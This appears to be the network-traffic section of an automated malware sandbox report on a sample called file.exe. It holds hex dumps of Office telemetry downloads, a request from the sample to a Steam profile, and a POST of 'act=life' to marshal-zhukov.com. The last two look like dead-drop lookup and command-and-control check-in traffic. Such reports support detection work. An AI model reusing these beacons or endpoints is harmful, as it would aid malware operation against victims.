                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                              2024-11-27 15:31:21 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.1049708104.121.10.344438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:22 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:22 GMT
                                                                                                                                                                                                                                                              Content-Length: 35135
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: sessionid=66708665460a7f113ebe4b7c; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C820d04e8bfee2ac1774d9f20f79a4923; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC16384INData Raw: 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09
                                                                                                                                                                                                                                                              Data Ascii: community.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC3768INData Raw: 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61
                                                                                                                                                                                                                                                              Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actua
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC504INData Raw: 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09
                                                                                                                                                                                                                                                              Data Ascii: team Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              2192.168.2.104971213.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                              x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153123Z-174f7845968cpnpfhC1EWR3afc0000000wng00000000n7gz
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              3192.168.2.104971313.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                              x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153123Z-174f7845968ljs8phC1EWRe6en0000000wwg00000000m3wk
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              4192.168.2.104970913.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                              x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153123Z-174f784596886s2bhC1EWR743w0000000x4000000000g2d1
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              5192.168.2.104971113.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                              x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153123Z-174f78459684bddphC1EWRbht40000000wyg000000001vw0
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              6192.168.2.104971013.107.246.43443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                              x-ms-request-id: 24868834-401e-002a-5e69-40c62e000000
                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                              x-azure-ref: 20241127T153123Z-174f7845968glpgnhC1EWR7uec0000000xa0000000008w1m
                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              2024-11-27 15:31:23 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.1049715172.67.160.804438100C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-11-27 15:31:24 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: marshal-zhukov.com
                                                                                                                                                                                                                                                              2024-11-27 15:31:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-11-27 15:31:27 UTC1037INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Wed, 27 Nov 2024 15:31:27 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=0sokfsjfp5kpqv9hhb0ntr16pr; expires=Sun, 23-Mar-2025 09:18:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TuqNiS9HqdjGeBApKTHacQuRZ2QsuTvAfCUkVqF970nZYasuTsdegF8PIzrGxHjm3teai3%2B6sQPu5K6SwgRx%2ByugIgmaxAIiKakW72lzmSmftStaRI9jtbS3yJXuJk1DcaCPEic%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
